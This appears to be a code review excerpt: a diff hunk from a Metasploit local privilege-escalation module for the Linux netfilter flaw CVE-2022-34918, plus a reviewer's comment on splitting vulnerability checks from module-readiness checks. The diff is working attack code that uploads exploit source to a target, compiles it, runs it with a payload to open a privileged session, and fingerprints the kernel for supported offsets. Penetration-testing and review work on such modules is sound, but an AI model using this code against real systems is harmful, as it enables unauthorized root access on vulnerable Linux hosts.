modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb

```diff
@@ -0,0 +1,208 @@
+        full_path_target = ::File.join(@exploit_source_path, current_dir, ent)
+        if File.file?(full_path_host)
+          vprint_status("Uploading #{relative_path} to #{full_path_target}")
+          upload_file(full_path_target, full_path_host)
+        elsif File.directory?(full_path_host)
+          vprint_status("Creating the directory #{full_path_target}")
+          mkdir(full_path_target)
+          dirs.push(relative_path)
+        else
+          print_error("#{full_path_host} doesn't look like a file or a directory")
+        end
+      end
+    end
+    register_dir_for_cleanup(@exploit_source_path)
+  end
+
+  def compile_source
+    fail_with(Failure::BadConfig, 'make command not available on the target') unless command_exists?('make')
+    info = cmd_exec("make -C #{@exploit_source_path}")
+    vprint_status(info)
+    @executable_path = ::File.join(@exploit_source_path, 'ubuntu.elf')
+    if exists?(@executable_path)
+      chmod(@executable_path, 0o700) unless executable?(@executable_path)
+      print_good('Compilation was successful')
+    else
+      fail_with(Failure::UnexpectedReply, 'Compilation has failed (executable not found)')
+    end
+  end
+
+  def run_payload
+    info = cmd_exec(@executable_path, @payload_path)
+    info.each_line do |line|
+      print_status(line.chomp)
+    end
+    print_status('Payload executed! If it was successful, a session should have been created')
+  end
+
+  def get_external_source_code(cve, file)
+    file_path = ::File.join(::Msf::Config.install_root, "external/source/exploits/#{cve}/#{file}")
+    ::File.binread(file_path)
+  end
+
+  def strip_comments(c_code)
+    c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+  end
+
+  def check
+    config = kernel_config
+
+    return CheckCode::Unknown('Could not retrieve kernel config') if config.nil?
+
+    return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y')
+
+    return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled?
+
+    return CheckCode::Safe('LKRG is installed') if lkrg_installed?
+
+    arch = kernel_hardware
+
+    return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64')
+
+    release = kernel_release
+    version = "#{release} #{kernel_version.split(' ').first}"
+    ubuntu_offsets = strip_comments(get_external_source_code('CVE-2022-34918', 'src/util.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first
+    ubuntu_kernels = ubuntu_offsets.scan(/"(.+?)"/).flatten
+    if ubuntu_kernels.empty?
+      fail_with(Msf::Module::Failure::BadConfig, 'Error parsing the list of supported kernels.')
+    end
+    if ubuntu_kernels.include?(version)
+      return CheckCode::Appears("Kernel #{version} appears to be vulnerable.")
+    end
+
+    version, patchlvl = release.match(/^(\d+)\.(\d+)/)&.captures
+    if version&.to_i == 5 && patchlvl && (7..19).include?(patchlvl)
```

Comment:
For local exploits like this where the target is vulnerable, but the offsets are not present, I have started to create a second `module_check` that checks if the module will work. https://github.com/rapid7/metasploit-framework/blob/b8f6e2d5490c6b258c479bb038ab1e084c29966a/modules/exploits/linux/local/cve_2022_0995_watch_queue.rb#L83
It is nice for us to let consumers and automation use the regular `check` method to let you know that the target is vulnerable, while we continue to stop execution if the module itself will not work.